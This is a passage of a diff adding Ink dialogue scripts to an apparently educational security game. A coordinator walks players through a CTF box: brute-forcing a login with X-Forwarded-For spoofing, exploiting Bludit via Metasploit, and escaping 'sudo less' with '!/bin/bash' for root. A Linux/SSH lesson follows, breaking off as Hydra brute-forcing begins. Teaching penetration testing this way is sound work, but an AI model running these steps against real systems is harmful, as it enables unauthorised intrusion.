POST request and select "Fuzz..." + + CTF Challenge Coordinator: 6. Select the password field and add a payload with common passwords + + CTF Challenge Coordinator: 7. Add the X-Forwarded-For script as a message processor + + CTF Challenge Coordinator: 8. Launch the fuzzer and look for different HTTP response codes + + CTF Challenge Coordinator: Successful logins typically return 301 or 302 (redirect) instead of 200 (error message). + + ~ instructor_rapport += 5 + +- -> guided_mode_hub + +=== phase_4_post_exploit === +CTF Challenge Coordinator: Phase 4 is post-exploitation - exploring the compromised system and hunting for flags. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: You should have a Meterpreter shell from the exploitation phase. + +CTF Challenge Coordinator: Now it's time to explore the system, understand your access level, and find flags. + ++ [What Meterpreter commands should I use?] + CTF Challenge Coordinator: Essential Meterpreter commands for exploration: + + CTF Challenge Coordinator: getuid - Shows your current username + + CTF Challenge Coordinator: sysinfo - System information (OS, architecture, etc.) + + CTF Challenge Coordinator: pwd - Print working directory + + CTF Challenge Coordinator: ls - List files in current directory + + CTF Challenge Coordinator: cat filename - Read file contents + + CTF Challenge Coordinator: cd /path - Change directory + + CTF Challenge Coordinator: shell - Drop to OS shell (Ctrl-C to return to Meterpreter) + + ~ instructor_rapport += 5 + ++ [Where should I look for flags?] + CTF Challenge Coordinator: Flags are hidden in various locations: + + CTF Challenge Coordinator: Check your current directory - there might be a flag right where you land + + CTF Challenge Coordinator: Look in user home directories: /home/username/ + + CTF Challenge Coordinator: Different users might have different flags + + CTF Challenge Coordinator: Eventually, you'll need to check /root/ but that requires privilege escalation + + CTF Challenge Coordinator: Some flags might be in encrypted files - note encryption hints for later + + ~ instructor_rapport += 5 + ++ [How do I switch users?] + CTF Challenge Coordinator: To switch users, you need to drop to an OS shell first: + + CTF Challenge Coordinator: From Meterpreter, run: shell + + CTF Challenge Coordinator: Now you have a Linux shell. Use: su username + + CTF Challenge Coordinator: However, you'll need the user's password to switch + + CTF Challenge Coordinator: If you discovered the Bludit admin user's password earlier, you can switch to that user + + CTF Challenge Coordinator: Return to Meterpreter with Ctrl-C when done + + ~ instructor_rapport += 5 + +- -> guided_mode_hub + +=== phase_5_privesc === +CTF Challenge Coordinator: Phase 5 is privilege escalation - gaining root access to fully control the system. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: Your initial shell is likely running as the www-data user (the web server user) with limited privileges. + +CTF Challenge Coordinator: To access all system files and read flags in /root/, you need to escalate to root. + ++ [How do I check my privileges?] + CTF Challenge Coordinator: From a shell, check your privileges: + + CTF Challenge Coordinator: whoami - Shows your username + + CTF Challenge Coordinator: id - Shows UID, GID, and groups + + CTF Challenge Coordinator: sudo -l - Lists commands you can run with sudo + + CTF Challenge Coordinator: Note: You might need a proper TTY terminal first: python3 -c 'import pty; pty.spawn("/bin/bash")' + + CTF Challenge Coordinator: This spawns a proper terminal that sudo will accept. + + ~ instructor_rapport += 5 + ++ [What's the sudo privilege escalation method?] + CTF Challenge Coordinator: When you run sudo -l, you'll see what commands you can run as root. + + CTF Challenge Coordinator: If you can run /usr/bin/less with sudo, that's your ticket to root! + + CTF Challenge Coordinator: The 'less' command is a pager for viewing files, but it can also execute shell commands. + + CTF Challenge Coordinator: When viewing a file with less, press ! followed by a command to execute it. + + CTF Challenge Coordinator: Since less is running with sudo privileges, any command you run will execute as root! + + ~ instructor_rapport += 5 + ++ [Walk me through getting root access] + CTF Challenge Coordinator: Here's the complete privilege escalation process: + + CTF Challenge Coordinator: 1. Drop to shell from Meterpreter: shell + + CTF Challenge Coordinator: 2. Spawn a proper terminal: python3 -c 'import pty; pty.spawn("/bin/bash")' + + CTF Challenge Coordinator: 3. Check sudo permissions: sudo -l + + CTF Challenge Coordinator: 4. You should see you can run less on a specific file + + CTF Challenge Coordinator: 5. Run that command with sudo: sudo /usr/bin/less /path/to/file + + CTF Challenge Coordinator: 6. When the file is displayed, type: !id + + CTF Challenge Coordinator: 7. You should see uid=0 (root!) in the output + + CTF Challenge Coordinator: 8. Now type: !/bin/bash + + CTF Challenge Coordinator: 9. You now have a root shell! Verify with: whoami + + CTF Challenge Coordinator: Now you can access /root/ and find the final flags! + + ~ instructor_rapport += 5 + +- -> guided_mode_hub + +=== complete_walkthrough === +CTF Challenge Coordinator: Here's the complete solution walkthrough from start to finish: + +~ instructor_rapport += 10 +~ ctf_mastery += 20 + +CTF Challenge Coordinator: **Phase 1 - Reconnaissance:** + +CTF Challenge Coordinator: nmap -sV -p- TARGET_IP + +CTF Challenge Coordinator: dirb http://TARGET_IP + +CTF Challenge Coordinator: nikto -h http://TARGET_IP + +CTF Challenge Coordinator: Browse discovered files, find admin login at /admin/, discover Bludit CMS, find leaked credentials + +CTF Challenge Coordinator: **Phase 2 - Exploitation:** + +CTF Challenge Coordinator: msfconsole + +CTF Challenge Coordinator: search bludit + +CTF Challenge Coordinator: use exploit/linux/http/bludit_upload_images_exec + +CTF Challenge Coordinator: set RHOSTS TARGET_IP + +CTF Challenge Coordinator: set BLUDITUSER admin (or discovered username) + +CTF Challenge Coordinator: set BLUDITPASS discovered_password + +CTF Challenge Coordinator: exploit + +CTF Challenge Coordinator: **Phase 3 - Post-Exploitation:** + +CTF Challenge Coordinator: getuid, sysinfo, ls, cat flag.txt (in current directory) + +CTF Challenge Coordinator: shell + +CTF Challenge Coordinator: su bludit_admin (with discovered password) + +CTF Challenge Coordinator: cat ~/flag.txt (in that user's home) + +CTF Challenge Coordinator: **Phase 4 - Privilege Escalation:** + +CTF Challenge Coordinator: python3 -c 'import pty; pty.spawn("/bin/bash")' + +CTF Challenge Coordinator: sudo -l (discover you can run less on a specific file) + +CTF Challenge Coordinator: sudo /usr/bin/less /path/to/file + +CTF Challenge Coordinator: !id (verify root) + +CTF Challenge Coordinator: !/bin/bash (spawn root shell) + +CTF Challenge Coordinator: cd /root && ls (find final flags) + +CTF Challenge Coordinator: That's the complete solution! Try to replicate it yourself now that you understand the approach. + +-> guided_mode_hub + +-> END diff --git a/story_design/ink/game_scenarios/intro_linux.ink b/story_design/ink/game_scenarios/intro_linux.ink new file mode 100644 index 0000000..be48723 --- /dev/null +++ b/story_design/ink/game_scenarios/intro_linux.ink @@ -0,0 +1,942 @@ +// =========================================== +// LINUX FUNDAMENTALS AND SECURITY LAB +// Introduction to Linux and Security +// =========================================== +// Game-Based Learning replacement for lab sheet +// Original: introducing_attacks/1_intro_linux.md +// =========================================== + +// Progress tracking +VAR linux_basics_discussed = false +VAR command_line_skills_discussed = false +VAR vi_editor_discussed = false +VAR piping_discussed = false +VAR redirection_discussed = false +VAR networking_discussed = false +VAR ssh_discussed = false +VAR hydra_discussed = false +VAR kali_intro_discussed = false + +// Detailed topic tracking +VAR pwd_ls_discussed = false +VAR file_manipulation_discussed = false +VAR man_pages_discussed = false +VAR piping_examples_discussed = false +VAR redirection_examples_discussed = false +VAR ifconfig_discussed = false +VAR ssh_basics_discussed = false +VAR ssh_x_forwarding_discussed = false +VAR bruteforce_basics_discussed = false + +// Challenge completion +VAR completed_vi_challenge = false +VAR completed_piping_challenge = false +VAR completed_ssh_challenge = false +VAR completed_hydra_challenge = false + +// Instructor relationship +VAR instructor_rapport = 0 +VAR deep_dives_completed = 0 + +// External variables +EXTERNAL player_name + +// =========================================== +// ENTRY POINT - LINUX INSTRUCTOR +// =========================================== + +=== start === +~ instructor_rapport = 0 + +Tech Instructor: Welcome to Linux Fundamentals and Security, Agent {player_name}. I'm your technical instructor for this session. + +Tech Instructor: This lab covers essential Linux command-line skills, remote administration via SSH, and basic penetration testing techniques. All crucial skills for field operations. + +Tech Instructor: Think of this as building your foundational toolkit. Every SAFETYNET agent needs to be comfortable in Linux environments—most of our targets run Linux servers, and Kali Linux is our primary offensive platform. + +-> linux_training_hub + +// =========================================== +// MAIN TRAINING HUB +// =========================================== + +=== linux_training_hub === + +Tech Instructor: What would you like to cover? + ++ {not linux_basics_discussed} [Learn about Linux basics and why it matters] + -> linux_basics_intro ++ {not command_line_skills_discussed} [Essential command-line skills] + -> command_line_skills ++ {not vi_editor_discussed} [Learn the vi editor] + -> vi_editor_intro ++ {not piping_discussed} [Piping between programs] + -> piping_intro ++ {not redirection_discussed} [Redirecting input and output] + -> redirection_intro ++ {not networking_discussed} [Basic Linux networking] + -> networking_basics ++ {not kali_intro_discussed} [Introduction to Kali Linux] + -> kali_intro ++ {not ssh_discussed} [Remote shell access with SSH] + -> ssh_intro ++ {not hydra_discussed} [Attacking SSH with Hydra] + -> hydra_intro ++ {linux_basics_discussed and command_line_skills_discussed} [Show me the essential commands reference] + -> commands_reference ++ {ssh_discussed or hydra_discussed} [Tips for the hands-on challenges] + -> challenge_tips ++ [I'm ready to start the practical exercises] + -> ready_for_practice ++ [That's all I need for now] + -> end_session + +// =========================================== +// LINUX BASICS +// =========================================== + +=== linux_basics_intro === +~ linux_basics_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Excellent starting point. Let me explain why Linux matters for security work. + +Tech Instructor: Linux is the backbone of modern internet infrastructure. Google, Facebook, Amazon—they all run Linux servers at massive scale. When you're conducting penetration tests or investigating security incidents, you'll encounter Linux systems constantly. + +Tech Instructor: More importantly for us, the best security tools are Linux-native. Kali Linux contains hundreds of specialized tools for penetration testing, forensics, and security analysis. Mastering Linux means mastering your toolkit. + +Tech Instructor: Linux comes in many "distributions"—different flavors packaged for different purposes. Ubuntu for ease of use, Debian for stability, Kali for security testing. They all share the same core commands and concepts, so learning one helps you understand them all. + +* [Why not just use Windows?] + ~ deep_dives_completed += 1 + You: Why can't we just use Windows for security work? + -> windows_comparison +* [What makes Kali special?] + ~ deep_dives_completed += 1 + You: What specifically makes Kali Linux the industry standard? + -> kali_explanation +* [Got it, let's move on] + You: Understood. Linux is essential for security work. + -> linux_training_hub + +=== windows_comparison === +~ instructor_rapport += 8 + +Tech Instructor: Fair question. Windows absolutely has its place—many enterprise environments are Windows-heavy, and you'll need those skills too. + +Tech Instructor: But for offensive security work, Linux has three major advantages: + +Tech Instructor: **First**, the tools. Most cutting-edge security research happens in the open-source community, and those tools are Linux-first. Sure, some get ported to Windows eventually, but you'll always be behind the curve. + +Tech Instructor: **Second**, the control. Linux gives you deep system access and transparency. You can see exactly what's happening, modify anything, and automate everything. That level of control is crucial when you're trying to exploit systems or analyze malware. + +Tech Instructor: **Third**, the culture. The security community lives in Linux. Understanding Linux means understanding how other security professionals work, communicate, and share knowledge. + +~ instructor_rapport += 5 +-> linux_training_hub + +=== kali_explanation === +~ instructor_rapport += 8 + +Tech Instructor: Kali is essentially a curated arsenal of security tools, all pre-configured and ready to use. + +Tech Instructor: Offensive Security—the company behind Kali—maintains hundreds of tools across every category: information gathering, vulnerability analysis, wireless attacks, exploitation, post-exploitation, forensics, you name it. + +Tech Instructor: What makes Kali special isn't just the tools, though. It's the integration. Everything works together. The tools are kept up-to-date. Documentation is solid. And it's become the lingua franca of penetration testing—when security professionals share techniques, they assume you're using Kali. + +Tech Instructor: Think of it like this: you *could* build your own toolkit from scratch, hunting down each tool individually and figuring out dependencies. Or you could use Kali and get straight to the actual security work. + +~ instructor_rapport += 5 +-> linux_training_hub + +// =========================================== +// COMMAND-LINE SKILLS +// =========================================== + +=== command_line_skills === +~ command_line_skills_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Right, let's build your command-line fundamentals. These are skills you'll use every single day in the field. + +Tech Instructor: The command line might seem archaic compared to graphical interfaces, but it's exponentially more powerful. You can automate tasks, chain commands together, work on remote systems, and handle massive datasets—all from a simple text interface. + +Tech Instructor: I'll cover the essential commands: navigating the filesystem, manipulating files and directories, viewing content, and getting help when you're stuck. + +* [Show me the navigation commands] + ~ pwd_ls_discussed = true + You: How do I navigate the filesystem? + -> navigation_commands +* [How do I work with files?] + ~ file_manipulation_discussed = true + You: What about creating and editing files? + -> file_manipulation +* [How do I get help when stuck?] + ~ man_pages_discussed = true + You: What if I don't know what a command does? + -> man_pages +* [I want to see the full command reference] + You: Can I see a complete list of essential commands? + -> commands_reference + +=== navigation_commands === +~ instructor_rapport += 3 + +Tech Instructor: Navigation is your foundation. Here are the essentials: + +Tech Instructor: **pwd** - "print working directory". Shows exactly where you are in the filesystem. Lost? Run pwd. + +Tech Instructor: **ls** - lists files in your current directory. Add "-la" for detailed information including hidden files and permissions. You'll use "ls -la" constantly. + +Tech Instructor: **cd** - "change directory". Moves you around the filesystem. "cd .." goes up one level, "cd" alone takes you home. + +Tech Instructor: Pro tip: pressing Tab autocompletes filenames and commands. Type a few letters, hit Tab, save yourself endless typing. And use the up arrow to cycle through previous commands. + +* [Tell me more about ls flags] + You: What other useful flags does ls have? + Tech Instructor: Great question. "ls -lt" sorts by modification time, newest first. "ls -lh" shows human-readable file sizes. "ls -lR" recursively lists subdirectories. You can combine them: "ls -lhta" shows all files, human-readable sizes, sorted by time. + ~ instructor_rapport += 5 + -> command_line_followup +* [What about hidden files?] + You: What are hidden files? + Tech Instructor: In Linux, files starting with "." are hidden—they don't show up in normal ls output. Configuration files are typically hidden. Use "ls -a" to see them. You'll frequently need to examine hidden config files during security assessments. + ~ instructor_rapport += 5 + -> command_line_followup +* [Got it] + -> command_line_followup + +=== command_line_followup === ++ [Show me file manipulation commands] + -> file_manipulation ++ [How do I get help when stuck?] + -> man_pages ++ [Back to the main menu] + -> linux_training_hub + +=== file_manipulation === +~ instructor_rapport += 3 + +Tech Instructor: Creating, copying, moving, and viewing files. Bread and butter stuff. + +Tech Instructor: **mkdir** - creates directories. "mkdir mydir" creates a new folder. + +Tech Instructor: **cp** - copies files. "cp source destination" copies a file. Add "-r" for recursive directory copying. + +Tech Instructor: **mv** - moves or renames files. "mv oldname newname" renames. "mv file /path/to/destination/" moves it. + +Tech Instructor: **cat** - dumps file contents to the screen. "cat filename" shows the whole file. + +Tech Instructor: **echo** - prints text. "echo 'hello world'" displays text. Useful for testing and scripting. + +* [Tell me more about viewing files] + You: Cat seems limited for large files... + Tech Instructor: Exactly right. For large files, use **less**. "less filename" lets you scroll through, search with "/", quit with "q". Much more practical than cat for big files. + ~ instructor_rapport += 8 + -> command_line_followup +* [What about creating files?] + You: How do I create a new empty file? + Tech Instructor: Several ways. "touch filename" creates an empty file. Or redirect output: "echo 'content' > filename" creates a file with content. We'll cover redirection shortly. + ~ instructor_rapport += 5 + -> command_line_followup +* [Understood] + -> command_line_followup + +=== man_pages === +~ man_pages_discussed = true +~ instructor_rapport += 8 + +Tech Instructor: This is possibly the most important skill: learning to teach yourself. + +Tech Instructor: **man** - the manual pages. "man command" shows comprehensive documentation for any command. Navigation: space to page down, "b" to page up, "/" to search, "q" to quit. + +Tech Instructor: Example: "man ls" shows every flag and option for ls. The man pages are detailed, sometimes overwhelming, but they're authoritative. + +Tech Instructor: Alternative: **info** command provides similar documentation, sometimes more detailed. + +Tech Instructor: Pro tip: if you're really stuck, try "command --help" for a quick summary. Many tools also have online documentation, but man pages are always available, even when you're offline on a compromised system with no internet. + +* [How do I search man pages?] + You: Can I search across all man pages for a topic? + Tech Instructor: Yes. "man -k keyword" searches all man page descriptions. "apropos keyword" does the same thing. Useful when you know what you want to do but not which command does it. + ~ instructor_rapport += 10 + -> command_line_followup +* [What if man pages are too dense?] + You: Man pages can be pretty technical... + Tech Instructor: True. For beginner-friendly explanations, try "tldr command"—it shows simplified examples. Or search online for "command examples". But learning to parse man pages is a skill worth developing. They're accurate, complete, and always available. + ~ instructor_rapport += 8 + -> command_line_followup +* [Makes sense] + -> command_line_followup + +// =========================================== +// VI EDITOR +// =========================================== + +=== vi_editor_intro === +~ vi_editor_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Ah, vi. The editor that's been causing both frustration and devotion since 1976. + +Tech Instructor: Here's why you need to know vi: it's on *every* Unix and Linux system. When you SSH into a compromised server with minimal tools, vi will be there. Other editors might not be. + +Tech Instructor: Vi is modal. Two main modes: **normal mode** for commands, **insert mode** for typing text. + +Tech Instructor: The essentials: +- "vi filename" opens or creates a file +- Press "i" to enter insert mode (now you can type) +- Press Esc to return to normal mode +- In normal mode: ":wq" writes and quits, ":q!" quits without saving + +Tech Instructor: That's literally everything you need to survive vi. + +* [Tell me more about normal mode commands] + ~ deep_dives_completed += 1 + You: What else can I do in normal mode? + -> vi_advanced_commands +* [Why not use nano or another editor?] + You: Why not just use nano? It seems simpler. + Tech Instructor: Nano is fine for quick edits. But vi is universal and powerful. On hardened systems or embedded devices, vi might be your only option. Plus, once you learn it, vi is dramatically faster. Your call, but I recommend at least learning vi basics. + ~ instructor_rapport += 5 + -> vi_editor_followup +* [I'll learn the basics] + ~ completed_vi_challenge = true + You: Got it. I'll practice the essential commands. + -> vi_editor_followup + +=== vi_advanced_commands === +~ instructor_rapport += 8 + +Tech Instructor: Want to unlock vi's power? Here are some favorites: + +Tech Instructor: **Navigation in normal mode:** +- "h" "j" "k" "l" move cursor left, down, up, right +- "w" jumps forward by word, "b" jumps back +- "gg" jumps to start of file, "G" jumps to end + +Tech Instructor: **Editing in normal mode:** +- "dd" deletes current line +- "30dd" deletes 30 lines +- "yy" copies (yanks) current line +- "p" pastes +- "u" undo +- "/" searches, "n" finds next match + +Tech Instructor: You can combine commands: "d10j" deletes 10 lines down. "c3w" changes next 3 words. + +Tech Instructor: Ten minutes with a vi tutorial will make you look like a wizard. It's worth it. + +~ instructor_rapport += 10 +-> vi_editor_followup + +=== vi_editor_followup === ++ [Back to main menu] + -> linux_training_hub + +// =========================================== +// PIPING +// =========================================== + +=== piping_intro === +~ piping_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Piping is where Linux becomes genuinely powerful. You can chain simple commands together to accomplish complex tasks. + +Tech Instructor: The pipe operator "|" sends the output of one command to the input of another. + +Tech Instructor: Example: "cat /etc/passwd | grep /home/" + +Tech Instructor: This reads the passwd file and filters it to only lines containing "/home/". Two simple commands, combined to do something useful. + +Tech Instructor: You can chain multiple pipes: "cat /etc/passwd | grep /home/ | sort -r" - now it's filtered *and* sorted in reverse. + +* [Show me more examples] + ~ piping_examples_discussed = true + You: What are some practical piping examples? + -> piping_examples +* [What commands work well with pipes?] + You: Which commands are commonly piped together? + -> piping_common_commands +* [I've got the concept] + ~ completed_piping_challenge = true + -> linux_training_hub + +=== piping_examples === +~ instructor_rapport += 8 + +Tech Instructor: Here are real-world examples you'll use constantly: + +Tech Instructor: **Finding running processes:** +"ps aux | grep ssh" - lists all processes, filters for SSH-related ones. + +Tech Instructor: **Analyzing logs:** +"cat logfile | grep ERROR | sort | uniq -c | sort -nr" - finds errors, sorts them, counts unique occurrences, sorts by frequency. One line, powerful analysis. + +Tech Instructor: **Network analysis:** +"netstat -an | grep ESTABLISHED" - shows active network connections. + +Tech Instructor: **Counting things:** +"ls | wc -l" - counts files in current directory. + +Tech Instructor: The Unix philosophy: small tools that do one thing well, combined creatively. Piping is how you combine them. + +~ completed_piping_challenge = true +~ instructor_rapport += 5 +-> linux_training_hub + +=== piping_common_commands === +~ instructor_rapport += 8 + +Tech Instructor: Commands that work brilliantly in pipes: + +Tech Instructor: **grep** - filters lines matching a pattern. Your most-used pipe command. + +Tech Instructor: **sort** - sorts lines alphabetically. "-n" for numeric sort, "-r" for reverse. + +Tech Instructor: **uniq** - removes duplicate adjacent lines. Usually used after sort. "-c" counts occurrences. + +Tech Instructor: **head** and **tail** - show first or last N lines. "head -20" shows first 20 lines. + +Tech Instructor: **wc** - word count. "-l" counts lines, "-w" counts words, "-c" counts characters. + +Tech Instructor: **cut** - extracts columns from text. "cut -d: -f1" splits on colons, takes first field. + +Tech Instructor: **awk** and **sed** - powerful text processing. More advanced, but incredibly useful. + +Tech Instructor: Learn these, and you can process massive datasets from the command line. + +~ completed_piping_challenge = true +~ instructor_rapport += 5 +-> linux_training_hub + +// =========================================== +// REDIRECTION +// =========================================== + +=== redirection_intro === +~ redirection_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Redirection lets you send command output to files or read input from files. + +Tech Instructor: Three key operators: + +Tech Instructor: **>** - redirects output to a file, overwriting it. "ls > filelist.txt" saves directory listing to a file. + +Tech Instructor: **>>** - redirects output to a file, appending. "echo 'new line' >> file.txt" adds to the end. + +Tech Instructor: **<** - reads input from a file. "wc -l < file.txt" counts lines in the file. + +Tech Instructor: Practical example: "ps aux > processes.txt" saves a snapshot of running processes for analysis. + +* [Show me more redirection examples] + ~ redirection_examples_discussed = true + You: What are some practical redirection scenarios? + -> redirection_examples +* [What about error messages?] + You: Can I redirect error messages too? + -> stderr_redirection +* [Understood] + -> linux_training_hub + +=== redirection_examples === +~ instructor_rapport += 8 + +Tech Instructor: Practical redirection scenarios: + +Tech Instructor: **Saving command output for later:** +"ifconfig > network_config.txt" - captures network configuration. + +Tech Instructor: **Building logs:** +"echo '$(date): Scan completed' >> scan_log.txt" - appends timestamped entries. + +Tech Instructor: **Combining with pipes:** +"cat /etc/passwd | grep /home/ > users.txt" - filters and saves results. + +Tech Instructor: **Quick file creation:** +"echo 'test content' > test.txt" - creates a file with content in one command. + +Tech Instructor: During security assessments, you'll constantly redirect command output to files for documentation and later analysis. + +~ instructor_rapport += 5 +-> linux_training_hub + +=== stderr_redirection === +~ instructor_rapport += 10 + +Tech Instructor: Good catch. There are actually two output streams: stdout (standard output) and stderr (standard error). + +Tech Instructor: By default, ">" only redirects stdout. Error messages still appear on screen. + +Tech Instructor: To redirect stderr: "command 2> errors.txt" + +Tech Instructor: To redirect both: "command > output.txt 2>&1" - sends stderr to stdout, which goes to the file. + +Tech Instructor: Or in modern Bash: "command &> output.txt" does the same thing more simply. + +Tech Instructor: To discard output entirely: "command > /dev/null 2>&1" - sends everything to the void. + +Tech Instructor: This is advanced stuff, but incredibly useful when scripting or when you want clean output. + +~ instructor_rapport += 10 +-> linux_training_hub + +// =========================================== +// NETWORKING BASICS +// =========================================== + +=== networking_basics === +~ networking_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Linux networking commands. Essential for understanding network configurations and troubleshooting connectivity. + +Tech Instructor: **ifconfig** - the classic command to view network interfaces and IP addresses. Shows all your network adapters. + +Tech Instructor: **ip** - the modern replacement. "ip a s" (ip address show) does the same thing. You'll see both used in the field. + +Tech Instructor: **hostname -I** - quick way to display just your IP address. + +Tech Instructor: In our environment, your IP typically starts with "172.22" or "10" - those are private network ranges. + +* [Tell me more about network interfaces] + ~ ifconfig_discussed = true + You: What are network interfaces exactly? + -> network_interfaces +* [How do I troubleshoot network issues?] + You: What if my network isn't working? + -> network_troubleshooting +* [What about finding other machines?] + You: How do I discover other systems on the network? + Tech Instructor: Good question, but that's scanning territory. We'll cover tools like nmap in the scanning module. For now, focus on understanding your own network configuration. + ~ instructor_rapport += 5 + -> linux_training_hub +* [Got it] + -> linux_training_hub + +=== network_interfaces === +~ instructor_rapport += 8 + +Tech Instructor: Network interfaces are how your computer connects to networks. Think of them as connection points. + +Tech Instructor: **eth0, eth1** - Ethernet interfaces. Physical network ports. + +Tech Instructor: **wlan0** - Wireless interface. WiFi adapter. + +Tech Instructor: **lo** - Loopback interface, always 127.0.0.1. Your computer talking to itself. Useful for testing. + +Tech Instructor: **Virtual interfaces** - VPNs and containers create virtual interfaces like tun0, tap0, docker0. + +Tech Instructor: When you run ifconfig, you see all interfaces, their IP addresses, MAC addresses, and traffic statistics. Essential information for network security assessments. + +~ instructor_rapport += 5 +-> linux_training_hub + +=== network_troubleshooting === +~ instructor_rapport += 8 + +Tech Instructor: Basic network troubleshooting steps: + +Tech Instructor: **Step 1:** Check interface status with "ifconfig" or "ip a s". Is the interface up? Does it have an IP? + +Tech Instructor: **Step 2:** If no IP, try "dhclient eth0" to request one from DHCP server. + +Tech Instructor: **Step 3:** Test local connectivity: "ping 127.0.0.1" tests your network stack. + +Tech Instructor: **Step 4:** Test gateway: "ping your_gateway_ip" tests local network. + +Tech Instructor: **Step 5:** Test DNS: "ping google.com" tests name resolution and external connectivity. + +Tech Instructor: In our lab environment, if you're having issues, usually dhclient fixes it. In the field, troubleshooting can be much more complex. + +~ instructor_rapport += 5 +-> linux_training_hub + +// =========================================== +// KALI LINUX +// =========================================== + +=== kali_intro === +~ kali_intro_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Kali Linux. Your primary offensive security platform. + +Tech Instructor: Released by Offensive Security in 2013 as the successor to BackTrack Linux. It's specifically designed for penetration testing, security auditing, and digital forensics. + +Tech Instructor: Kali includes hundreds of pre-installed tools organized by category: information gathering, vulnerability analysis, wireless attacks, web applications, exploitation tools, password attacks, forensics, and more. + +Tech Instructor: Default credentials: username "kali", password "kali". Never use Kali as your primary OS—it's designed for security testing, not everyday computing. + +* [Show me what tools are available] + You: What kinds of tools are we talking about? + -> kali_tools_overview +* [How is Kali organized?] + You: How do I find the right tool for a task? + -> kali_organization +* [Sounds powerful] + -> linux_training_hub + +=== kali_tools_overview === +~ instructor_rapport += 8 + +Tech Instructor: Let me give you a taste of what's available: + +Tech Instructor: **Information Gathering:** nmap, dnsenum, whois, recon-ng. Tools for mapping networks and gathering intelligence. + +Tech Instructor: **Vulnerability Analysis:** Nessus, OpenVAS, nikto. Automated scanners that identify security weaknesses. + +Tech Instructor: **Exploitation:** Metasploit Framework, BeEF, sqlmap. Tools for actively exploiting vulnerabilities. + +Tech Instructor: **Password Attacks:** Hydra, John the Ripper, hashcat. Cracking and bruteforcing credentials. + +Tech Instructor: **Wireless Attacks:** Aircrack-ng, Reaver, Wifite. WiFi security testing. + +Tech Instructor: **Forensics:** Autopsy, Sleuth Kit, Volatility. Analyzing systems and recovering data. + +Tech Instructor: And those are just highlights. Run "ls /usr/bin" to see hundreds more. It's an arsenal. + +~ instructor_rapport += 5 +-> linux_training_hub + +=== kali_organization === +~ instructor_rapport += 8 + +Tech Instructor: Kali organizes tools by the penetration testing lifecycle: + +Tech Instructor: **Phase 1 - Information Gathering:** Passive and active reconnaissance. Learning about your target. + +Tech Instructor: **Phase 2 - Vulnerability Analysis:** Identifying weaknesses in systems and applications. + +Tech Instructor: **Phase 3 - Exploitation:** Actually compromising systems using identified vulnerabilities. + +Tech Instructor: **Phase 4 - Post-Exploitation:** What you do after gaining access. Maintaining access, pivoting, data exfiltration. + +Tech Instructor: The Applications menu mirrors this structure. When you need a tool, think about which phase you're in, and browse that category. + +Tech Instructor: You'll also quickly learn the handful of tools you use constantly. Nmap, Metasploit, Burp Suite, Wireshark—these become second nature. + +~ instructor_rapport += 5 +-> linux_training_hub + +// =========================================== +// SSH - SECURE SHELL +// =========================================== + +=== ssh_intro === +~ ssh_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: SSH - Secure Shell. Encrypted remote access to systems. One of your most critical tools. + +Tech Instructor: SSH lets you securely connect to remote Linux systems and execute commands as if you were sitting at that machine. All traffic is encrypted, protecting against eavesdropping. + +Tech Instructor: Basic usage: "ssh username@ip_address" + +Tech Instructor: The server typically listens on port 22. When you connect, you authenticate (usually with password or key), and then you have a remote shell. + +Tech Instructor: SSH replaced older, insecure protocols like Telnet and rlogin, which transmitted passwords in cleartext. Never use those—always use SSH. + +* [Tell me about SSH keys] + You: What about SSH key authentication? + -> ssh_keys +* [What's X11 forwarding?] + ~ ssh_x_forwarding_discussed = true + You: I saw something about -X flag for forwarding? + -> ssh_x_forwarding +* [How do I verify I'm connecting to the right server?] + You: How do I know I'm not being man-in-the-middled? + -> ssh_fingerprints +* [Let's talk about attacking SSH] + You: How do we test SSH security? + -> ssh_to_hydra_transition +* [Got the basics] + ~ completed_ssh_challenge = true + -> linux_training_hub + +=== ssh_keys === +~ instructor_rapport += 10 + +Tech Instructor: SSH keys are asymmetric cryptography for authentication. Much more secure than passwords. + +Tech Instructor: You generate a key pair: a private key (keep secret) and public key (share freely). + +Tech Instructor: Generate keys: "ssh-keygen -t rsa -b 4096" + +Tech Instructor: Copy public key to server: "ssh-copy-id user@server" + +Tech Instructor: Now you can SSH without typing passwords. The private key proves your identity. + +Tech Instructor: Benefits: stronger than passwords, can't be bruteforced, can be passphrase-protected, can be revoked per-server. + +Tech Instructor: Many organizations require key-based auth and disable password authentication entirely. Learn this workflow. + +~ instructor_rapport += 10 +-> ssh_intro + +=== ssh_x_forwarding === +~ instructor_rapport += 8 + +Tech Instructor: X11 forwarding is clever. Linux graphical applications use the X Window System. SSH can tunnel X11 traffic. + +Tech Instructor: Connect with: "ssh -X user@server" + +Tech Instructor: Now you can run graphical programs on the remote server, but see them on your local screen. The program runs remotely, but displays locally. + +Tech Instructor: Example: "kate" opens the text editor, running on the remote system but displaying on yours. Useful for accessing GUI tools remotely. + +Tech Instructor: Warning: some latency over networks. And it does expose some security risks—only use on trusted connections. + +~ instructor_rapport += 5 +-> ssh_intro + +=== ssh_fingerprints === +~ instructor_rapport += 10 + +Tech Instructor: Excellent security awareness. SSH uses host key fingerprints to prevent man-in-the-middle attacks. + +Tech Instructor: When you first connect, SSH shows the server's fingerprint. You should verify this matches the real server before accepting. + +Tech Instructor: On the server, check fingerprint: "ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub" + +Tech Instructor: If the fingerprint matches what SSH showed you, type "yes". SSH remembers this and will warn if it changes later. + +Tech Instructor: If the fingerprint changes unexpectedly, that's a warning sign. Could be a man-in-the-middle attack, or could be the server was rebuilt. Investigate before proceeding. + +Tech Instructor: Most people skip this check. Don't be most people. Especially in adversarial security contexts. + +~ instructor_rapport += 10 +-> ssh_intro + +=== ssh_to_hydra_transition === +Tech Instructor: Now you're thinking like a penetration tester. Let's talk about attacking SSH. +-> hydra_intro + +// =========================================== +// HYDRA - SSH ATTACKS +// =========================================== + +=== hydra_intro === +~ hydra_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Hydra. THC-Hydra, to be specific. A parallelized login cracker supporting numerous protocols. + +Tech Instructor: Hydra performs **online bruteforce attacks**—it actually tries to log in with username/password combinations. Different from offline attacks where you crack hashed 